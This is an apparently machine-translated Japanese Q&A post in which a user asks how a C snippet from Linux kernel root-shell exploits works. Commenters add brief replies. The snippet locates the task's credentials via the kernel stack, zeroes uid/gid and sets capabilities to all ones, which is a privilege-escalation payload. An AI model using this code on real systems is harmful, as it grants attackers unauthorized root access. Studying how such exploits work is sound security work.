を悪用、私はしばしば、このようなポインタを参照してください。説明はrootシェルを取得するためのいくつかの悪用では、コード
int i;
unsigned *p = *(unsigned**)(((unsigned long)&i) & ~8191);
誰もがこのポインタを少し説明できますか? 8191はカーネルスタックのサイズだと思います。 p
は、カーネルスタックのの底を指していますか? はここでポインタp
が使用されている方法です。
int i;
unsigned *p = *(unsigned**)(((unsigned long)&i) & ~8191);
for (i = 0; i < 1024-13; i++) {
if (p[0] == uid && p[1] == uid &&
p[2] == uid && p[3] == uid &&
p[4] == gid && p[5] == gid &&
p[6] == gid && p[7] == gid) {
p[0] = p[1] = p[2] = p[3] = 0;
p[4] = p[5] = p[6] = p[7] = 0;
p = (unsigned *) ((char *)(p + 8) + sizeof(void *));
p[0] = p[1] = p[2] = ~0;
break;
}
p++;
}
バイナリの値「8191」は「1111111111111」であり、「long」のタイプは32ビットです。私はあなたに確かな答えを与えると思います、 '* p'ポインタがどのように使用されているか見る必要があります。 '&'演算子はおそらく何らかの種類のビットマスクです。 –
@TimBiegeleisenご返信ありがとうございます。私はそれを編集しました。 – HuangJie